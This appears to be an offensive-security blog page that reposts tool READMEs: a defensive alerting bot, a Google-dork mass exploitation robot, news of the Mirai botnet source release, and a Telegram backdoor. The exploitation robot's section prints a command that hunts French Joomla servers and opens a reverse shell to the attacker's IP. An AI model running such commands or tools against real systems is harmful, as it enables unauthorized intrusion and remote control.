Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Bot. Show all posts
Showing posts with label Bot. Show all posts

Saturday, May 27, 2017

Distributed alerting for the masses! - Securitybot



Distributed alerting for the masses!
Securitybot is an open-source implementation of a distributed alerting chat bot, as described in Ryan Huber's blog post. Distributed alerting improves the monitoring efficiency of your security team and can help you catch security incidents faster and more efficiently. We've tried to remove all Dropbox-isms from this code so that setting up your own instance should be fairly painless. It should be relatively easy to install the listed requirements in a virtualenv/Docker container and simply have the bot do its thing. We also provide a simple front end to dive through the database, receive API calls, and create custom alerts for the bot to reach out to people as desired.

Deploying
This guide runs through setting up a Securitybot instance as quickly as possible with no frills. We'll be connecting it to Slack, SQL, and Duo. Once we're done, we'll have a file that looks something like main.py.

SQL
You'll need a database called securitybot on some MySQL server somewhere. We've provided a function called init_sql located in securitybot/sql.py that will initialize SQL. Currently it's set up to use the host localhost with user root and no password. You'll need to change this because of course that's not how your database is set up.

Slack
You'll need a token to be able to integrate with Slack. The best thing to do would be to create a bot user and use that token for Securitybot. You'll also want to set up a channel to which the bot will report when users specify that they haven't performed an action. Find the unique ID for that channel (it'll look similar to C123456) and be sure to invite the bot user into that channel, otherwise it won't be able to send messages.

Duo
For Duo, you'll want to create an Auth API instances, name it something clever, and keep track of the integration key, secret key, and auth API endpoint URI.

Running the bot
Take a look at the provided main.py in the root directory for an example on how to use all of these. Replace all of the global variables with whatever you found above. If the following were all generated successfully, Securitybot should be up and running. To test it, message the bot user it's assigned to and say hi. To test the process of dealing with an alert, message test to test the bot.

Architecture
Securitybot was designed to be as modular as possible. This means that it's possible to easily swap out chat systems, 2FA providers, and alerting data sources. The only system that is tightly integrated with the bot is SQL, but adding support for other databases shouldn't be difficult. Having a database allows alerts to be persistent and means that the bot doesn't lose (too much) state if there's some transient failure.

Securitybot proper
The bot itself performs a small set of functions:
  1. Reads messages, interpreting them as commands.
  2. Polls each user object to update their state of applicable.
  3. Grabs new alerts from the database and assigns them to users or escalates on an unknown user.
Messaging, 2FA, and alert management are provided by configurable modules, and added to the bot upon initialization.

Commands
The bot handles incoming messages as commands. Command parsing and handling is done in the Securitybot class and the commands themselves are provided in two places. The functions for the commands are defined in commands.py and their structure is defined in commands.yaml under the config/ directory.

Messaging
Securitybot is designed to be compatible with a wide variety of messaging systems. We currently provide bindings for Slack, but feel free to contribute any other plugins, like for Gitter or Zulip, upstream. Messaging is made possible by securitybot/chat/chat.py which provides a small number of functions for querying users in a messaging group, messaging those users, and sending messages to a specific channel/room. To add bindings for a new messaging system, subclass Chat.

2FA
2FA support is provided by auth/auth.py, which wraps async 2FA in a few functions that enable checking for 2FA capability, starting a 2FA session, and polling the state of the 2FA session. We provide support for Duo Push via the Duo Auth API, but adding support for a different product or some in-house 2FA solution is as easy as creating a subclass of Auth.

Task management
Task management is provided by tasker/tasker.py and the Tasker class. Since alerts are logged in an SQL database, the provided Tasker is SQLTasker. This provides support for grabbing new tasks and updating them via individual Task objects.

Blacklists
Blacklists are handled by the SQL database, provided in blacklist/blacklist.py and the subclass blacklist/sql_blacklist.py.

Users
The User object provides support for handling user state. We keep track of whatever information a messaging system gives to us, but really only ever use a user's unique ID and username in order to contact them.

Alerts
Alerts are uniquely identified by a SHA-256 hash which comes from some hash of the event that generated them. We assume that a SHA-256 hash is sufficiently random for there to be no collisions. If you encounter a SHA-256 collision, please contact someone at your nearest University and enjoy the fame and fortune it brings upon you.


Share:

Monday, December 12, 2016

Google Mass Explorer - Google Explorer



[+] Google Mass Explorer

This is a automated robot for google search engine.
Make a google search, and parse the results for a especific exploit you define. The options can be listed with --help parameter.


Intro:
This project is a main project that i will keep upgrading when new exploits are published. They idea is use google search engine to find vulnerable targets, for specific exploits. The exploits parsers will be concentrated in google_parsers module. So when you make a search, you can choose explicit in "--exploit parser" argument, a especific exploit to the robot test if is the targets are vulnerable for that or not.
** !!! Is very important you use the right dork for the specific exploit.
The google parsers module (google_parsers.py) is the file that i will keep upgrading. For this version i'm putting just the joomla cve exploit. I have a wordpress bot too, but the ideia is you make your own parsers =))) If you have difficul to make, just send me the exploit and we make together =))
I make this google explorer because i'm very busy, and take to much time to search for targets in google manually. So I use a automated framework (Selenium) to make a robot to search for targets for me ;)) The problem using other libs and modules, is the captcha from google, and using Selenium, you can type the captcha when it is displayed, and the robots keeps crawling with no problem =)) This was the only way i find out to "bypass" this kind of protection... After it work, i decide to publish to everyone.

How the robot works:
1 - Make a google search
2 - Parse the from each page results
3 - Test if each target is vulnerable for a specific exploit.

Requiriments:
!!!!!! PYTHON 3 !!!!!!
The requirements is in requirements.txt file, you should install what is listed on it with:
$ sudo pip install -r requirements.txt
These are some exemples that you can use, and make your own:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
On this exemple, im looking for servers in France, vulnerables to joomla RCE, using google.com domain as google search (they are listed in google_doomais.txt file), with last update on last month.
All these options are possible to any language, it will depends only in what google use for syntax for your country..
I have some old videos on my channel on youtube showing how it works, so take a look at the description of the olders projects in github if you need some video exemples ;))

Usage:
google_explorer.py --dork=<arg> --browser=<arg> [--exploit_parser=<arg>] [--language=<arg>]
[--location=<arg>] [--last_update=<arg>]
[--revshell=<arg>] [--port=<arg>]
[--google_domain=<arg>]

google_explorer.py --help
google_explorer.py --version
Options:
-h --help                                Open help menu
-v --version Show version
Required options:
--dork='google dork'                     your favorite g00gle dork :)
--browser='browser' chrome
chromium
Optional options:
--language='page language'               Portuguese
English
Arabic
Romanian
...
...

--location='server location' Brazil
Mauritania
Tunisia
Marroco
Japan
...
...

--last_update='page last update' anytime
past 24 hours
past week
past month
past year

--exploit_parser='Name or CVE exploit' joomla_15_12_2015_rce
generic_parser

--revshell='IP' public ip for reverse shell
--port='PORT' port for back connect

--google_domain='google domain' google domain to use on search. Ex: google.co.uk

Share:

Sunday, November 6, 2016

Mirai Source Code Released




The IoT Botnet Mirai’s source code has been published online by its author along with configuration and set-up details. Naturally, web security analysts are expecting a series of online attacks from malicious threat actors. The reason behind their concerns is that this code can easily convert any hackable, that is, unsecured or unprotected devices like the routers, web cameras and phone, etc., into DDoS Bots. These bots can then be used to attack websites and to take them offline.





Share:

Tuesday, May 31, 2016

Blaze Telegram Backdoor Toolkit - Bt2




bt2 is a Python-based backdoor in form of a IM bot that uses the infrastructure and the feature-rich bot API provided by Telegram, slightly repurposing its communication platform to act as a C&C.

Dependencies

Installation


$ sudo pip install telepot $ sudo pip install requestsPS: Telepot requires minimum of requests 2.9.1 to work properly.

Limitations

Currently the shellcode execution component is dependent on ctypes and works only on Windows platforms.

Usage

Before using this code one has to register a bot with Telegram. This can be done by talking to Botfather - after setting up the name for the bot and username you will get a key that will be used to interact with the bot API.
For more information see Telegram bots: an introduction for developers
Also, it is highly advisable to replace 'botmaster ID' with the ID of the master, locking the communication between the bot to the specific ID of the botmaster to avoid abuse from unauthorized parties.


$ python bt2.py



Resources

We published a blog post with a few more details on command and control platforms and how to use the tool: https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/

Known bugs
  • After launching a reverse shell and exiting from it, all commands sent to the bot have duplicate responses.
  • The 'kill' functionality is not working as it should.
  • After successful execution of shellcode, the bot dies. Upon return it fetches the previous messages from the server and executes the shellcode again. Need to find a way to avoid fetching of previous messages.

Author
  • Julio Cesar Fort - julio at blazeinfosec dot com
  • Twitter: @juliocesarfort / @blazeinfosec

Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition